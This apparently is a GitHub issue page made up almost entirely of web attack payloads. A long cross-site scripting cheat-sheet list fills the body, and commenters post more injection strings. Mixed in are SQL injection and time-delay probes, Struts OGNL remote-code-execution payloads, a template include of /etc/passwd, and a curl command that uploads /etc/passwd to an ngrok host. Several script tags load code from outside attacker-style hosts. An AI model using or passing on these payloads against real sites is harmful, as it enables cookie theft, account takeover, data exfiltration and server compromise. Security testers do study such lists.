onload!#$%&()*~+-_&#46;,&#58;;?@&#91;/|\&#93;^`=alert(\"XSS\")&gt; &lt;SCRIPT/XSS SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\"&gt;&lt;/SCRIPT&gt; &lt;IMG SRC=\" javascript&#58;alert('XSS');\"&gt; perl -e 'print \"&lt;SCR\0IPT&gt;alert(\\"XSS\\")&lt;/SCR\0IPT&gt;\";' &gt; out perl -e 'print \"&lt;IMG SRC=java\0script&#58;alert(\\"XSS\\")&gt;\";' &gt; out &lt;IMG SRC=\"jav&#x0D;ascript&#58;alert('XSS');\"&gt; &lt;IMG SRC=\"jav&#x0A;ascript&#58;alert('XSS');\"&gt; &lt;IMG SRC=\"jav&#x09;ascript&#58;alert('XSS');\"&gt; &lt;IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29&gt; &lt;IMG SRC=&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58&#97&#108&#101&#114&#116&#40&#39&#88&#83&#83&#39&#41&gt; &lt;IMG SRC=javascript&#58;alert('XSS')&gt; &lt;IMG SRC=javascript&#58;alert(String&#46;fromCharCode(88,83,83))&gt; &lt;IMG \"\"\"&gt;&lt;SCRIPT&gt;alert(\"XSS\")&lt;/SCRIPT&gt;\"&gt; &lt;IMG SRC=`javascript&#58;alert(\"RSnake says, 'XSS'\")`&gt; &lt;IMG SRC=javascript&#58;alert(&quot;XSS&quot;)&gt; &lt;IMG SRC=JaVaScRiPt&#58;alert('XSS')&gt; &lt;IMG SRC=javascript&#58;alert('XSS')&gt; &lt;IMG SRC=\"javascript&#58;alert('XSS');\"&gt; &lt;SCRIPT SRC=http&#58;//ha&#46;ckers&#46;org/xss&#46;js&gt;&lt;/SCRIPT&gt; '';!--\"&lt;XSS&gt;=&{()} ';alert(String&#46;fromCharCode(88,83,83))//\';alert(String&#46;fromCharCode(88,83,83))//\";alert(String&#46;fromCharCode(88,83,83))//\\";alert(String&#46;fromCharCode(88,83,83))//--&gt;&lt;/SCRIPT&gt;\"&gt;'&gt;&lt;SCRIPT&gt;alert(String&#46;fromCharCode(88,83,83))&lt;/SCRIPT&gt; ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//-->&lt;/SCRIPT>">'>&lt;SCRIPT>alert(String.fromCharCode(88,83,83))&lt;/SCRIPT> '';!--"<XSS>=&{()} &lt;SCRIPT SRC=http://ha.ckers.org/xss.js>&lt;/SCRIPT> <IMG SRC="javascript:alert('XSS');"> <IMG SRC=javascript:alert('XSS')> <IMG SRC=javascrscriptipt:alert('XSS')> <IMG SRC=JaVaScRiPt:alert('XSS')> <IMG """>&lt;SCRIPT>alert("XSS")&lt;/SCRIPT>"> <IMG SRC=" &#14; javascript:alert('XSS');"> <SCRIPT/XSS SRC="http://ha.ckers.org/xss.js">&lt;/SCRIPT> <SCRIPT/SRC="http://ha.ckers.org/xss.js">&lt;/SCRIPT> <&lt;SCRIPT>alert("XSS");//<&lt;/SCRIPT> &lt;SCRIPT>a=/XSS/alert(a.source)&lt;/SCRIPT> \";alert('XSS');// &lt;/TITLE>&lt;SCRIPT>alert("XSS");&lt;/SCRIPT> �script�alert(�XSS�)�/script� <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');"> &lt;IFRAME SRC="javascript:alert('XSS');">&lt;/IFRAME> <FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET> <TABLE BACKGROUND="javascript:alert('XSS')"> <TABLE><TD BACKGROUND="javascript:alert('XSS')"> <DIV STYLE="background-image: url(javascript:alert('XSS'))"> <DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029"> <DIV STYLE="width: expression(alert('XSS'));"> &lt;STYLE>@im\port'\ja\vasc\ript:alert("XSS")';&lt;/STYLE> <IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))"> <XSS STYLE="xss:expression(alert('XSS'))"> exp/*<A STYLE='no\xss:noxss("*//*");xss:&#101;x&#x2F;*XSS*//*/*/pression(alert("XSS"))'> <EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED> a="get";b="URL(ja\"";c="vascr";d="ipt:ale";e="rt('XSS');\")";eval(a+b+c+d+e); &lt;SCRIPT SRC="http://ha.ckers.org/xss.jpg">&lt;/SCRIPT> <HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS&lt;SCRIPT DEFER&gt;alert(&quot;XSS&quot;)&lt;/SCRIPT&gt;"></BODY></HTML> &lt;SCRIPT>document.write("<SCRI");&lt;/SCRIPT>PT SRC="http://ha.ckers.org/xss.js">&lt;/SCRIPT> <form id="test" /><button form="test" formaction="javascript:alert(123)">TESTHTML5FORMACTION <form><button formaction="javascript:alert(123)">crosssitespt <frameset onload=alert(123)> <!--<img src="--><img src=x onerror=alert(123)//"> &lt;style><img src="&lt;/style><img src=x onerror=alert(123)//"> <object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="> <embed src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="> <embed src="javascript:alert(1)"> <? foo=">&lt;script>alert(1)&lt;/script>"> <! foo=">&lt;script>alert(1)&lt;/script>"> </ foo=">&lt;script>alert(1)&lt;/script>"> &lt;script>({0:#0=alert/#0#/#0#(123)})&lt;/script> &lt;script>ReferenceError.prototype.__defineGetter__('name', function(){alert(123)}),x&lt;/script> &lt;script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('alert(1)')()&lt;/script> &lt;script src="#">{alert(1)}&lt;/script>;1 &lt;script>crypto.generateCRMFRequest('CN=0',0,0,null,'alert(1)',384,null,'rsa-dual-use')&lt;/script> <svg xmlns="#">&lt;script>alert(1)&lt;/script></svg> <svg onload="javascript:alert(123)" xmlns="#"></svg> &lt;iframe xmlns="#" src="javascript:alert(1)">&lt;/iframe> +ADw-script+AD4-alert(document.location)+ADw-/script+AD4- %2BADw-script+AD4-alert(document.location)%2BADw-/script%2BAD4- +ACIAPgA8-script+AD4-alert(document.location)+ADw-/script+AD4APAAi- %2BACIAPgA8-script%2BAD4-alert%28document.location%29%2BADw-%2Fscript%2BAD4APAAi- %253cscript%253ealert(document.cookie)%253c/script%253e �><s�%2b�cript>alert(document.cookie)&lt;/script> �>&lt;ScRiPt>alert(document.cookie)&lt;/script> �><&lt;script>alert(document.cookie);//<&lt;/script> foo&lt;script>alert(document.cookie)&lt;/script> <scr&lt;script>ipt>alert(document.cookie)</scr&lt;/script>ipt> %22/%3E%3CBODY%20onload=�document.write(%22%3Cs%22%2b%22cript%20src=http://my.box.com/xss.js%3E%3C/script%3E%22)�%3E �; alert(document.cookie); var foo=� foo\�; alert(document.cookie);//�; &lt;/script>&lt;script >alert(document.cookie)&lt;/script> <img src=asdf onerror=alert(document.cookie)> <BODY ONLOAD=alert(�XSS�)> &lt;script>alert(1)&lt;/script> ">&lt;script>alert(String.fromCharCode(66, 108, 65, 99, 75, 73, 99, 101))&lt;/script> <video src=1 onerror=alert(1)> <audio src=1 onerror=alert(1)>

@nullr3x
Copy link
Author

nullr3x commented Dec 25, 2017

“/>.<<img src=x onerror=alert(1)//">><>

@nullr3x nullr3x closed this as completed Dec 25, 2017
@nullr3x
Copy link
Author

nullr3x commented Dec 25, 2017

'">

@nullr3x
Copy link
Author

nullr3x commented Dec 25, 2017

@nullr3x
Copy link
Author

nullr3x commented Dec 25, 2017

@nullr3x
Copy link
Author

nullr3x commented Dec 25, 2017

@nullr3x nullr3x changed the title '"><img src=x onerror=prompt(1)> '"><img src=x onerror=prompt(1)>https://html5sec.org/test.svg Dec 25, 2017
@P1kAju
Copy link

P1kAju commented Oct 26, 2019

<body/onfocus=top.alert(1)>

@rahul-ps-1337
Copy link

``">

@rahul-ps-1337
Copy link

.multipart/form-data~%{#context["com.opensymphony.xwork2.dispatcher.HttpServletResponse"].addHeader("rahul",1337)}

Content-Type: ${#context["com.opensymphony.xwork2.dispatcher.HttpServletResponse"].addHeader("X-Ack",6311*4500)}.multipart/form-data

'alert\x2823\x29'instanceof{[Symbol.hasInstance]:eval}

'or 1=1#

OpEasy'+(select*from(slect(sleep(10)))a)+'

redirect:${(new+java.io.BufferedReader(new+java.io.InputStreamReader(@java.lang.Runtime()exec("id")getInputStream(),"UTF-8"))).readLine()}}

'OR(if(now()=sysdate(),sleep(13),O))OR'"+--+

$c{#context["com.opensymphony.xwork2.dispatcher.HttpServletResponse"].addHeader("Struts-RCE",191*7)}.multipart/form-data

/*-->]]>%>?></script></title></textarea></style></xmp>'-/"/-alert(1)//>'
'">

TESTLINK

wrtz{{(="".sub).call.call({}[$="constructor"].getOwnPropertyDescriptor(.proto,$).value,0,"alert(1)")()}}zzzz

c5obc'+alert(1)+'p7yd5

'%20OR%201=2%20UNION%20ALL%20SELECT%201,1,1,'i%20<3%20math'%20--%20--"

{% extends "/etc/passwd" %}

<svg </onload ="1> (=prompt,(1)) "">

javascript:alert(1)


'"()%26%25<script>alert1;</script>
<+svg/o+nload=al+ert(1)>
<svg/o<scriptnload=al+ert(1)>
<svg/onload='<script'-alert(1)>
<svg/onload=script:-alert(1)

[][filter]constructor();//

"><video </onloadeddata="1> (=alert,('XSS'))"" controls>

<object/onerror=write'1'//
">
"></textarea><ScRiPt>prompt(1)</ScRiPt//
"><iframe/onload=alert(1)//

”/>&_lt;_script>alert(1)&_lt;/scr_ipt&gt”/>

"><img+src%3Dx+onerror%3Dalert('OnxxxFilterBypass')>

Click Here

"><iframe/src=javascript:[document.domain].find(alert)>

Click Me

"></script>
<svg/on<script>load=prompt(document.domain);>
"/><svg/on<script>load=prompt(document.cookie);>

"><img src=x on><script>alert(document.domain)</script>error=prompt(1)>

a=01<xss&b=02<xss&c=03<xss&d=04<xss&e=05<xss&f=06<xss&g=07<xss&h=08<xss&i=09<xss&j=10<xss&k=11<xss&l=12<xss&m=13<xss&n=14<xss&o=15<xss&p=16<xss&q=17<xss&r=18<xss&s=19<xss&t=20<xss&u=21<xss&v=22<xss&w=23<xss&x=24<xss&y=25<xss&z=26
Strip Tags Based Bypass

"onmouseover=alert(1)// and

"autofocus onfocus=alert(1)//

test

javaſcript:CSS'\143\157\156\163\164\162\165\143\164\157\162'()

javaſcript:URL'\143\157\156\163\164\162\165\143\164\157\162'()

\”}})})-confirm1(a=>{({b:{/*///

<script>location.href;'javascript:alert%281%29'</script>

javaſcript:'\74\163\166\147\40\157\156\154\157\141\144\75\141\154\145\162\164\50\61\51\76'
curl -F shl=@/etc/passwd blablabla.ngrok.io
sleep 10

'"--><Details Open OnToggle=confirmK>
<marquee loop%3d1 width%3d0 onfinish%3dco\u006efirm(document.cookie)>XSS<%2fmarquee>

setIntervalalert\x28document.cookie\x29

<details/open/ontoggle%0d=%0d[1].find(confirm)//

<d3"<"/onclick="1>[confirm``]"<">z
<d3/onmouseenter=[2].find(confirm)>z

<script y="><">/* z click click

@zw5
Copy link

zw5 commented Mar 20, 2020

Click Me

@testtest-rgb
Copy link

@testtest-rgb
Copy link

xXx

@testtest-rgb
Copy link

xXx

@testtest-rgb
Copy link

xXx

@testtest-rgb
Copy link

xXx

@testtest-rgb
Copy link

xXx

@testtest-rgb
Copy link

xXx

@testtest-rgb
Copy link

@testtest-rgb
Copy link

x

@testtest-rgb
Copy link

x

@testtest-rgb
Copy link

x

@testtest-rgb
Copy link

x

@testtest-rgb
Copy link

1
t
x

@testtest-rgb
Copy link

<a href=>

@testtest-rgb
Copy link

@testtest-rgb
Copy link

<a href=>>

@WaterLord7788
Copy link

">

@WaterLord7788
Copy link

"><sr%00

@WaterLord7788
Copy link

@WaterLord7788
Copy link

">\n<sr%00
">
"><svg/offline=prompt(1)>

@WaterLord7788
Copy link

">

@WaterLord7788
Copy link

"><sr%00

@joaovitorzv
Copy link

'/>

@0x0asif
Copy link

0x0asif commented Dec 24, 2020

<img%20id=%26%23x101;%20src=x%20onerror=%26%23x101;;alert1;>
">{77}
"><Script><Svg/OnLoad=alert(1)>{7
7}
'"><svg/onload=prompt(5);>{{7*7}}
">

Style tag:-
https://www.rocketlawyer.com/search.rl?query=x.exec('id | nc evil.com 1337')
http://www.rout.com/search/q%3D%22%3E%3Csvg%7Conload%3Dalert%281%29%3E%26search%3D/deals

@rootz491
Copy link

rootz491 commented Jan 5, 2021

'>"> hello

@rootz491
Copy link

rootz491 commented Jan 5, 2021

'>"> hello

@rootz491
Copy link

rootz491 commented Jan 5, 2021

'<img src=x> hello

@rootz491
Copy link

rootz491 commented Jan 5, 2021

<img src=x onerror=alert(1)>

@rootz491
Copy link

rootz491 commented Jan 5, 2021

@rootz491
Copy link

rootz491 commented Jan 5, 2021

@rmdhfz
Copy link

rmdhfz commented Jan 7, 2021

<script onload=alert(1)>

@rmdhfz
Copy link

rmdhfz commented Jan 7, 2021

No description provided.

@rmdhfz
Copy link

rmdhfz commented Jan 7, 2021

<iframe src=x onerror=alert(0) prompt=alert(1)>

@rrrrrx
Copy link

rrrrrx commented May 29, 2021

&lt;p title=” </noscript>
<style onload= alert(document.domain)//"> *{/all/color/all/:/all/#f78fb3/all/;} </style>

@rrrrrx
Copy link

rrrrrx commented May 29, 2021

<script onload=alert(1)>

@rrrrrx
Copy link

rrrrrx commented May 29, 2021

@rrrrrx
Copy link

rrrrrx commented May 29, 2021

@geniuses17
Copy link

GeshaKorolLev

@linuxadi linuxadi mentioned this issue Dec 31, 2022
@ghost
Copy link

ghost commented Mar 1, 2023

">Click

@godsayans
Copy link

Click

@4LPH4ONE
Copy link

<script/src=//NJ.₨></script>

<script>alert(document.domain)</script>

<SCRIPT SRC=//XSS.VAVKAMIL.CZ></SCRIPT> '">>

Submit ">

{{7*7}}' CLICK ipt>alert(document.cookie)</script> ClickMe '"><script src=https://xss.report/c/rupaitanudas></script> ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> '';!--"=&{()} 0\"autofocus/onfocus=alert(1)-->

@4LPH4ONE
Copy link

No description provided.

@4LPH4ONE
Copy link

xss (1).pdf

@4LPH4ONE
Copy link

Click Me

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests